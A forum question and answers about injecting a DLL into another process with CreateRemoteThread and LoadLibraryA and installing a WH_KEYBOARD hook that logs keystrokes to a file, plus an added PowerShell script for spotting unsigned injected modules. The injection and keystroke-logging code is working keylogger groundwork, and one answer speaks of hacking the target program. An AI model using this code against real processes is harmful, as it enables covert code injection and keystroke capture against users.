2015-04-29 33 views
0

How to call a function inside an injected DLL

I want to capture keyboard messages from another process using an injected DLL, but I don't know where in my own program I have to call the function. Here is my DLL's entry point:

    // this is my DLL main function
    #include <windows.h>
    #include <stdio.h>

    static HINSTANCE hInst = NULL;   // module handle of this DLL, passed to SetWindowsHookEx
    static HHOOK     hkb   = NULL;   // hook handle returned by SetWindowsHookEx

    BOOL __declspec(dllexport) __stdcall installhook(void);

    BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
    {
        /* open log file (NULL if it cannot be opened; logging is best-effort) */
        FILE *file = NULL;
        if (fopen_s(&file, "d:\\dll\\temp.txt", "a+") != 0)
            file = NULL;

        switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            hInst = (HINSTANCE)hModule;
            // should the function call be here????
            installhook();
            break;
        case DLL_PROCESS_DETACH:
            if (file) fprintf(file, "DLL detach function called.\n");
            break;
        case DLL_THREAD_ATTACH:
            if (file) fprintf(file, "DLL thread attach function called.\n");
            break;
        case DLL_THREAD_DETACH:
            if (file) fprintf(file, "DLL thread detach function called.\n");
            break;
        }
        /* close log file */
        if (file) fclose(file);
        return TRUE;
    }

Here is my installhook function, which installs the KeyboardProc handler:

    LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam);

    BOOL __declspec(dllexport) __stdcall installhook(void)
    {
        /* hook only the calling thread; hInst is the module handle saved in DllMain */
        hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)KeyboardProc, hInst, GetCurrentThreadId());
        return hkb != NULL;   /* FALSE if the hook could not be installed */
    }

and this is the body of my KeyboardProc function:

    LRESULT __declspec(dllexport) CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
    {
        MessageBoxA(NULL, "key touched\n", "DLL_PROCESS_ATTACH", MB_OK | MB_ICONWARNING);
        /* bit 30 of lParam is set when the key was already down before this message;
           only HC_ACTION codes carry a key event */
        if (HC_ACTION == nCode && ((DWORD)lParam & 0x40000000))
        {
            if (wParam == VK_SPACE || wParam == VK_RETURN || (wParam >= 0x2f && wParam <= 0x100))
            {
                FILE *file = NULL;
                if (fopen_s(&file, "d:\\dll\\temp.txt", "a+") == 0 && file != NULL)
                {
                    fprintf(file, "%d.\n", nCode);   /* write the hook code as a number */
                    fclose(file);
                }
            }
        }
        return CallNextHookEx(hkb, nCode, wParam, lParam);
    }

and finally here is my main program, where I inject the DLL into the target process:

    #include <windows.h>
    #include <stdio.h>
    #include <string.h>
    #include <iostream>
    using std::cout;

    int main(void)
    {
        /* full path of the DLL to load into the target; placeholder, the path is not given in the question */
        const char buffer[] = "<full-path-to-your-dll>";

        int procID = 9448;
        HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procID);
        if (process == NULL) {
            printf("Error: the specified process couldn't be found.\n");
            return 1;
        }

        /*
        * Get address of the LoadLibrary function.
        */
        LPVOID addr = (LPVOID)GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryA");
        if (addr == NULL) {
            printf("Error: the LoadLibraryA function was not found inside kernel32.dll library.\n");
            return 1;
        }

        /*
        * Allocate new memory region inside the process's address space.
        * The terminating NUL must be copied too, so LoadLibraryA reads a complete string.
        */
        SIZE_T len = strlen(buffer) + 1;
        LPVOID arg = VirtualAllocEx(process, NULL, len, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
        if (arg == NULL) {
            printf("Error: the memory could not be allocated inside the chosen process.\n");
            return 1;
        }

        /*
        * Write the argument to LoadLibraryA to the process's newly allocated memory region.
        */
        BOOL n = WriteProcessMemory(process, arg, buffer, len, NULL);
        if (n == 0) {
            printf("Error: no bytes were written to the process's address space.\n");
            return 1;
        }

        cout << procID << "\nhandle:" << process << "\nAddress:" << addr << "\nVirtualArg:" << arg << "\nWM:" << n << "\n";

        /*
        * Inject our DLL into the process's address space.
        */
        HANDLE thread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)addr, arg, 0, NULL);
        if (thread == NULL) {
            printf("Error: the remote thread could not be created.\n");
        }
        else {
            printf("Success: the remote thread was successfully created.\n");
            CloseHandle(thread);
        }

        /*
        * Close the handle to the process, because we've already injected the DLL.
        */
        CloseHandle(process);
        return 0;
    }

What is wrong with my code, and what must I change to get the desired result?
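The injection sequence in the question (OpenProcess, VirtualAllocEx, WriteProcessMemory, then CreateRemoteThread on LoadLibraryA) leaves the DLL in the target's loaded-module list like any other library, which is the first thing a defender can check. As an added example, not code from the question or the answers, the following PowerShell script lists the modules of one process and reports those loaded from outside the usual system directories or lacking a valid Authenticode signature. The `$ProcessId` parameter and the list of trusted directories are assumptions for the example.

```powershell
# Added example (not code from the question or the answers): report modules loaded
# in a process that come from outside the expected directories or are not validly
# signed. A DLL loaded remotely via LoadLibraryA appears here like any other module,
# so this is a cheap first triage check for unexpected DLLs.
param(
    # Assumed input: the PID of the process to inspect (elevate for other users' processes).
    [Parameter(Mandatory = $true)][int]$ProcessId
)

# Directories from which modules are normally loaded. This list is an assumption
# for the example; extend it for your environment.
$trustedDirs = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } |
    ForEach-Object { $_.TrimEnd('\') + '\' }

$proc = Get-Process -Id $ProcessId -ErrorAction Stop

$report = foreach ($m in $proc.Modules) {
    $path = $m.FileName
    $inTrusted = $false
    foreach ($dir in $trustedDirs) {
        if ($path.StartsWith($dir, [System.StringComparison]::OrdinalIgnoreCase)) {
            $inTrusted = $true
            break
        }
    }
    # Authenticode status of the image on disk; 'Valid' means a chain to a trusted root.
    $sig = Get-AuthenticodeSignature -FilePath $path -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Process   = $proc.ProcessName
        Module    = $m.ModuleName
        Path      = $path
        Trusted   = $inTrusted
        Signature = if ($sig) { $sig.Status.ToString() } else { 'Unknown' }
    }
}

# Only the suspicious entries are shown; an empty result means nothing stood out.
$report |
    Where-Object { -not $_.Trusted -or $_.Signature -ne 'Valid' } |
    Sort-Object Path |
    Format-Table -AutoSize
```

Run it from a PowerShell whose bitness matches the target process (a 32-bit host cannot enumerate the modules of a 64-bit process), e.g. `.\Check-Modules.ps1 -ProcessId 9448`. An unsigned module under a user-writable path such as a temp or download directory is the pattern worth following up; a validly signed module outside the trusted list is usually just third-party software.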

Answers

1

Yes, it can be called from DLL_PROCESS_ATTACH. But according to MSDN:

hMod [in] Type: HINSTANCE. A handle to the DLL containing the hook procedure pointed to by the lpfn parameter. The hMod parameter must be set to NULL if the dwThreadId parameter specifies a thread created by the current process and if the hook procedure is within the code associated with the current process.

So change hMod to NULL:

    hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)KeyboardProc, NULL, GetCurrentThreadId());

+0

Thanks Krab, that's right, but do I need to call installhook from my program? How can I call installhook!? –

+0

No, you don't need to call installhook from the program that injects the DLL. You need to call it from the DLL, in DLL_PROCESS_ATTACH. If it doesn't work, it may be because the program you are trying to hack has some protection against this :) – Krab

+0

@MousaKhodaei: you should check the return value of SetWindowsHookEx – Krab